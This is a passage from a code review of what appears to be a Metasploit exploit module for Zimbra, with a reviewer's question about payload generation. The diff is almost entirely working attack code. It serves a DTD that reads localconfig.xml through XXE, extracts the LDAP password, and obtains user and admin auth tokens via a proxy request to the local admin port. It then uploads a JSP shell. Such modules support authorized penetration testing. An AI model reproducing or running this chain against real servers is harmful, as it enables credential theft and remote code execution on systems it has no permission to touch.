modules/exploits/linux/http/zimbra_xxe_rce.rb

```diff
@@ -0,0 +1,254 @@
+      'data' => data
+    })
+    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
+    res
+  end
+
+  def proxy_req(data, auth_cookie)
+    target = "https://127.0.0.1:7071#{normalize_uri(target_uri, '/service/admin/soap/AuthRequest')}"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/service/proxy/'),
+      'vars_get' => {'target' => target},
+      'cookie' => "ZM_ADMIN_AUTH_TOKEN=#{auth_cookie}",
+      'data' => data,
+      'headers' => {'Host' => "#{datastore['RHOST']}:7071"}
+    })
+    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
+    res
+  end
+
+  def upload_file(file_name, contents, cookie)
+    data = Rex::MIME::Message.new
+    data.add_part(file_name, nil, nil, 'form-data; name="filename1"')
+    data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"clientFile\"; filename=\"#{file_name}\"")
+    data.add_part("#{rand_text_numeric(2..5)}", nil, nil, 'form-data; name="requestId"')
+    post_data = data.to_s
+
+    send_request_cgi({
+      'method'          => 'POST',
+      'uri'             => normalize_uri(target_uri, '/service/extension/clientUploader/upload'),
+      'ctype'           => 'multipart/form-data; boundary=' + data.bound,
+      'data'            => post_data,
+      'cookie'          => cookie
+    })
+  end
+
+  def check
+    res = xxe_req(soap_discover(true))
+    if res.body =~ /zimbra/
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Unknown
+  end
+
+  def on_request_uri(cli, req)
+    ent_file = rand_text_alpha_lower(4..8)
+    ent_eval = rand_text_alpha_lower(4..8)
+
+    dtd =  <<~HERE
+    <!ENTITY % #{ent_file} SYSTEM "file:///opt/zimbra/conf/localconfig.xml">
+    <!ENTITY % #{ent_eval} "<!ENTITY #{@ent_data} '<![CDATA[%#{ent_file};]]>'>">
+    %#{ent_eval};
+    HERE
+    send_response(cli, dtd)
+  end
+
+  def primer
+    datastore['SSL'] = @ssl
+    res = xxe_req(soap_discover)
+    fail_with(Failure::UnexpectedReply, 'Password not found') unless res.body =~ /ldap_password.*?value&gt;(.*?)&lt;\/value/m
+    password = $1
+    username = 'zimbra'
+
+    print_good("Password found: #{password}")
+
+    data = soap_auth(username, password, false)
+    res = cookie_req(data)
+
+    fail_with(Failure::NoAccess, 'Failed to authenticate') unless res.get_cookies =~ /ZM_AUTH_TOKEN=([^;]+;)/
+    auth_cookie = $1
+
+    print_good("User cookie retrieved: ZM_AUTH_TOKEN=#{auth_cookie}")
+
+    data = soap_auth(username, password)
+    res = proxy_req(data, auth_cookie)
+
+    fail_with(Failure::NoAccess, 'Failed to authenticate') unless res.get_cookies =~ /(ZM_ADMIN_AUTH_TOKEN=[^;]+;)/
+    admin_cookie = $1
+
+    print_good("Admin cookie retrieved: #{admin_cookie}")
+
+    stager_name = "#{rand_text_alpha(8..16)}.jsp"
+    print_status('Uploading jsp shell')
+    res = upload_file(stager_name, payload.generate, admin_cookie)
```

Comment:
We prefer `payload.encoded`. Is there a reason you're calling `generate` specifically?